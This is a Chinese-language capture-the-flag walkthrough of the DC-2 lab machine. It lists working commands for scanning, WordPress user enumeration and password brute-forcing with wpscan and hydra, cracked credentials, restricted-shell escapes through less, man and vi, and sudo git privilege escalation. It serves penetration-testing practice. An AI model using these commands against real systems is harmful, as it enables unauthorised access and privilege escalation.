信息收集

arp扫内网

扫端口

nmap -A -p- -T4 192.168.1.139 -v

发现端口80和7744(ssh)

直接访问80端口会跳转，导致无法访问
kali修改hosts

漏洞利用

成功访问后到flag1

给了提示要用到cewl，cewl kali自带，用于爬行网站生成弱密码

cewl http://dc-2/ -w dc-2.txt

但是不知道用户名，先留着,
这里是wordpress框架，用wpscan(kali自带)爆出用户名

wpscan --url dc-2 -e u

爆出三个用户，在用cewl生成的字典进行密码爆破

wpscan --url http://dc-2 -P dc-2.txt -U admin

爆出来两个

tom/parturient jerry/adipiscing

dirb 扫目录

dirb http://dc-2

访问会直接跳转登录，拿上面账号登录
http://dc-2/wp-admin/user/

tom登录没东西
拿jerry登录

找到flag2

有个ssh，尝试爆破ssh

hydra -l tom -P dc-2.txt 192.168.1.139 ssh -s 7744 -V -t 5

jerry爆破失败

tom登录成功，不能用cat

命令执行绕过
最终发现只能用less

看到提示

发现有个su，用su登录jerry，这里也不知道为啥，jerry有密码但却不能爆破成功
其实做多了就知道flag在用户目录下

还是照着提示来，su不能用，要进行绕过

新东西

shell绕过限制

shell绕过限制学习
这里用修改环境变量的方法

export PATH=$PATH:/bin/   
export PATH=$PATH:/usr/bin

当然看到别的wp里还有别的手法，我个人没试出来

可使用less绕过：$less test    然后!'sh'
使用ls绕过：$man ls    然后!'sh'
使用vi绕过：$vi test    然后:!/bin/sh 或者 :!/bin/bash

即可绕过，然后flag4在jerry用户目录下

提权

提示提到了git,搜索git提权

切换jerry登录

sudo git help config
sudo git -p help
sudo git -p --help

成功提权